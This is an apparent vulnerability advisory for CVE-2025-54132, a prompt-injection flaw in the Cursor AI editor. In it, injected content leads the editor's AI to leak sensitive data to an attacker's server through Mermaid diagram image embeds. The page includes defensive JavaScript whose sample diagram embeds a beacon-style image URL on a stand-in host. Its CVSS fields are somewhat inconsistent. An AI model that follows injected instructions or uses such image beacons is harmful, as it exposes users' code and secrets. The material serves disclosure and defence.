Code Injection Vulnerability in Cursor AI Code Editor by Cursor
CVE-2025-54132

4.4 MEDIUM

Key Information:

Vendor: Cursor
Status: Vendor
CVE Published: 1 August 2025

What is CVE-2025-54132?

CVE-2025-54132 is a code injection vulnerability in Cursor, an AI-enhanced code editor built for streamlined programming workflows. It affects versions earlier than 1.3 and is linked to the Mermaid tool the editor uses to render diagrams. An attacker who exploits it can carry out a prompt injection that exfiltrates sensitive data to an external server under the attacker's control. The path runs through the mechanism that permits image embedding: a crafted image reference can be used to carry sensitive information out of the editor. The vulnerability needs prompt attention, because it can compromise the integrity of data processed within the code editor and is therefore a significant risk for organizations running this software in their development environments.
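As an added defensive example (not code from Cursor or Mermaid), the check below inspects a Mermaid diagram's source before it is rendered and flags any absolute URL that points off an allowlist of image hosts or that carries an unusually long query string, since the advisory names embedded images as the channel that carries data to an attacker-controlled server. The allowlisted host, the query-length threshold and the sample diagram are assumptions constructed for the example.

```javascript
// Added example, not Cursor's or Mermaid's code. Audits Mermaid diagram
// source for URLs that could serve as an image-based exfiltration channel.

const ALLOWED_IMAGE_HOSTS = new Set(["assets.internal.example"]); // assumption
const MAX_QUERY_LENGTH = 64; // assumption: an image URL rarely needs more

// Absolute http(s) URLs wherever they appear in the diagram text (HTML
// <img src>, Markdown images, link directives). Stops at common delimiters.
const URL_PATTERN = /https?:\/\/[^\s"'<>)\]]+/g;

// Returns { safe, findings }; each finding names the URL, its host and the
// reasons it was flagged.
function auditMermaidSource(source, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  const findings = [];
  for (const match of source.matchAll(URL_PATTERN)) {
    const raw = match[0];
    const reasons = [];
    let url;
    try {
      url = new URL(raw);
    } catch {
      findings.push({ raw, host: null, reasons: ["unparseable URL"] });
      continue;
    }
    if (!allowedHosts.has(url.hostname)) reasons.push("host not on allowlist");
    if (url.search.length > MAX_QUERY_LENGTH) reasons.push("oversized query string");
    if (reasons.length > 0) findings.push({ raw, host: url.hostname, reasons });
  }
  return { safe: findings.length === 0, findings };
}

// Rewrites every flagged URL to an inert placeholder so the diagram can still
// render without issuing a request to an unapproved host.
function stripUntrustedUrls(source, allowedHosts = ALLOWED_IMAGE_HOSTS) {
  const flagged = new Set(
    auditMermaidSource(source, allowedHosts).findings.map((f) => f.raw)
  );
  return source.replace(URL_PATTERN, (raw) => (flagged.has(raw) ? "about:blank" : raw));
}

// Constructed sample: one HTML label loads an image from an unapproved host,
// the other from the allowlisted asset host.
const SAMPLE_DIAGRAM = [
  "graph TD",
  "  A[\"<img src='https://untrusted.example/pixel.png?d=abc123'>\"] --> B",
  "  C[\"<img src='https://assets.internal.example/logo.png'>\"] --> D",
].join("\n");
```

Running `auditMermaidSource(SAMPLE_DIAGRAM)` reports the untrusted.example reference only; `stripUntrustedUrls` returns the same diagram with that URL neutralised and the allowlisted logo intact.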

Potential impact of CVE-2025-54132

  1. Data Exfiltration: The primary risk of CVE-2025-54132 is the unauthorized extraction of sensitive information from affected systems, potentially leading to data breaches that can expose proprietary code, intellectual property, or personal data.

  2. Malicious Manipulations: Because the attacker can steer the AI's behavior through prompt injection, the vulnerability opens the way for the model to produce harmful outputs that mislead developers and degrade the quality of the code being written.

  3. Reputational Damage: Organizations using the affected versions of Cursor face significant reputational risks. A successful exploit could not only result in financial loss due to data breaches but also damage the trust of clients and users in the organization's ability to safeguard critical information.


Affected Version(s)

cursor < 1.3

CVSS V3.1

Score: 4.4
Severity: MEDIUM
Confidentiality: High
Integrity: None
Availability: High
Attack Vector: Network
Attack Complexity: High
Privileges Required: High
User Interaction: None
Scope: Unchanged

Timeline

  • Vulnerability published